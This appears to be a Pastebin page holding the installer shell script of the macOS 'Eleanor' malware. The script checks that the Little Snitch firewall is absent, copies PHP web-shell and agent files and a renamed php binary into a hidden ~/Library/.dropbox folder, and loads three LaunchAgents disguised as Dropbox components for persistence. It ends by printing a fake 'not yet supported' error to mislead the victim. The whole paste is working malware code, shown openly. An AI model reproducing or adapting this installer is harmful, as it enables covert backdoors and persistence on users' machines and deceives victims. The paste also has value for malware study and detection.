API tools faq
paste
Advertisement
Rosyna

Eleanor malware script

Rosyna
Jul 5th, 2016
496
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.12 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/sh
  2.  
  3. USER=$(whoami)
  4. DIR=$(dirname $0 2>/dev/null)
  5.  
  6. if [ -z $DIR ]; then
  7.   DIR="."
  8. fi
  9.  
  10. if [ ! -d "/Library/Little Snitch" ]; then
  11.     SNITCH=1
  12. else
  13.     SNITCH=0
  14. fi
  15.  
  16. if [ 0 = 1 ]; then
  17.     SNITCH=1
  18. fi
  19.  
  20. if [ $SNITCH = 1 ]; then
  21.     if [ ! -d /Users/$USER/Library/.dropbox ]; then
  22.    
  23.         mkdir /Users/$USER/Library/.dropbox
  24.         cp $DIR/shell.php /Users/$USER/Library/.dropbox/ego.php
  25.         cp $DIR/rules /Users/$USER/Library/.dropbox/rules
  26.         cp $DIR/agent.php /Users/$USER/Library/.dropbox/deamon.php
  27.         cp $DIR/config /Users/$USER/Library/.dropbox/config
  28.         cp $DIR/check_hostname /Users/$USER/Library/.dropbox/check_hostname
  29.         cp $DIR/public.key /Users/$USER/Library/.dropbox/public.key
  30.         cp /usr/bin/php /Users/$USER/Library/.dropbox/dbd
  31.        
  32.         sed "s/CURRENTUSER/${USER}/g" $DIR/sync/data/storage_orig > $DIR/sync/data/storage
  33.         chmod 700 $DIR/sync/hs
  34.         cp -R $DIR/sync /Users/$USER/Library/.dropbox/sync
  35.         cp -R $DIR/rero /Users/$USER/Library/.dropbox/.rero
  36.         cp -R $DIR/utilities /Users/$USER/Library/.dropbox/utilities
  37.        
  38.         sed "s/CURRENTUSER/${USER}/g" $DIR/com.getdropbox.dropbox.usercontent_orig.plist > $DIR/com.getdropbox.dropbox.usercontent.plist
  39.         mv $DIR/com.getdropbox.dropbox.usercontent.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist
  40.         launchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist
  41.        
  42.         sed "s/CURRENTUSER/${USER}/g" $DIR/com.getdropbox.dropbox.integritycheck_orig.plist > $DIR/com.getdropbox.dropbox.integritycheck.plist
  43.         mv $DIR/com.getdropbox.dropbox.integritycheck.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist
  44.         launchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist
  45.        
  46.         sed "s/CURRENTUSER/${USER}/g" $DIR/com.getdropbox.dropbox.timegrabber_orig.plist > $DIR/com.getdropbox.dropbox.timegrabber.plist
  47.         mv $DIR/com.getdropbox.dropbox.timegrabber.plist ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist
  48.         launchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist
  49.        
  50.         VERSION=$(sw_vers -productVersion)
  51.         echo "Sorry, Mac OS X $VERSION is not yet supported."
  52.    
  53.     fi
  54. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!